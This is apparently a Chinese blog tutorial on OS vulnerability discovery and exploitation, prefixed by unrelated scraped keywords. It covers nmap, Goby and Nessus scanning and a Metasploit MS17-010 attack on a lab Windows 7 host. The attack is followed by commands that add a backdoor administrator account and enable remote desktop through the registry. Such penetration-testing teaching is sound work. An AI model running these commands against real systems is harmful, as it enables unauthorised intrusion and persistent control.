中国建设银行网站对公账户首页,内蒙古企业网站制作,中国建设官方网站登录,网站开发 石家庄操作系统漏洞发现前言一、操作系统漏洞发现1.1 namp2. Goby3. Nessus二#xff0c;进行渗透测试2.1 使用工具进行渗透1. metasploit2.2 EXP2.3 复现文章三#xff0c;操作系统漏洞修复前言 不管是对于App来说#xff0c;还是web站点来说#xff0c;操作系统是必须的#x…
操作系统漏洞发现前言一、操作系统漏洞发现1.1 namp2. Goby3. Nessus二进行渗透测试2.1 使用工具进行渗透1. metasploit2.2 EXP2.3 复现文章三操作系统漏洞修复前言 不管是对于App来说还是web站点来说操作系统是必须的对于任何一个站点进行渗透无非就是渗透如下几个方面 操作系统进行信息收集后查看站点操作系统是否为最新版本如果不是在网上搜索看当前操作系统是否有漏洞出现系统软件进行信息收集后通过看站点所开放的端口可以大致确定对方站点系统所使用的软件入80端口就是http服务端口对方站点应该有web站点开发8080对方站点可能有apache等软件在网上查找看当前apache版本是否有漏洞第三方软件如phpmyadminssh工具等看这个版本的软件是否有漏洞最后一步才是对站点网站进行渗透看网站是否有sql注入逻辑漏洞等 如下是针对操作系统漏洞发现的类容 一、操作系统漏洞发现 想要发现操作系统漏洞不用想肯定是工具扫描啊推荐如下三款工具nampGobynessus。 1.1 namp
namp扫描教程 如上教程中的脚本利用就是操作系统漏洞扫描如下是我扫描windows7靶机的结果由于安装的是没有进行更新的windows所以存在该漏洞图如下所示 2. Goby Goby使用的是忍者操作系统上面的忍者操作系统下载忍者操作系统安装教程进行漏洞扫描就如下两步把英文设置为中文之后一切操作都非常简单具体操作如下所示 如上所示点击开始就可以进行漏洞扫描了全部扫描结果以可视化的方式进行展现非常的人性化。 3. Nessus Nessus是三款工具中最优秀的Nessus的安装教程:Nessus安装教程安装好之后就可以进行漏洞扫描了其中的操作在安装教程中有说我这里就不进行重新说明了 二进行渗透测试
2.1 使用工具进行渗透
1. metasploit 开启metasploit及打开metasploit的控制台使用如下两条命令 service postgresql start # 开启数据库postgresq
msfconsole # 打开控制台搜索ms17-010可以利用的漏洞模块再次确定是否存在漏洞如下所示 search ms17-010 # 搜索模块
use 3 # 使用第三个模块看目标主机是否存在这个漏洞进一步的确定
show options # 查看需要设置的参数
set rhost 192.168.93.134 # 设置参数目标机器的IP地址为 192.168.93.134
run # 进行攻击exploit命令也可以搜索ms17-010可以利用的漏洞模块对漏洞进行攻击控制目标机器如下所示依次使用如下几条命令
search ms17-010
use 0 # 使用攻击模块攻击主机
show options
set rhost 192.168.93.134 设置攻击的目标地址
exploit4. 进行提权等一系列操作
shell # 控制目标机器
net user root 123456 /add # 创建普通用户
net localgroup administrators root /add # 对普通用户进行提权进行如下操作后你打开windows目标机器你会发现多了一个超级管理员用户如下所示 5. 远程访问控制 首先输入REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f,打开目标机器的3389端口该端口开放后就可以进行远程连接了 开放端口之后在新的终端进行远程桌面的连接如下所示 rdesktop 192.168.93.134:3389 # 进行远程连接目标机器192.168.93.134是我目标机器的IP地址如上再输入yes就是远程桌面的连接了连接后的结果如下所示 2.2 EXP EXP是漏洞攻击的代码可以进入如下两个网站进行查找如下所示 seebug漏洞平台 国家漏洞安全平台 漏洞利用数据库 2.3 复现文章 复现文章网上都有直接寻找如永恒之蓝 搜索技巧 信息搜集
三操作系统漏洞修复 针对设计错误微软公司会及时推出补丁程序用户只需及时下载并安装即可因此建议用户经常浏览微软的安全公告并及时下载补丁。 对于设置错误则应及时修改配置使系统更加安全可靠。
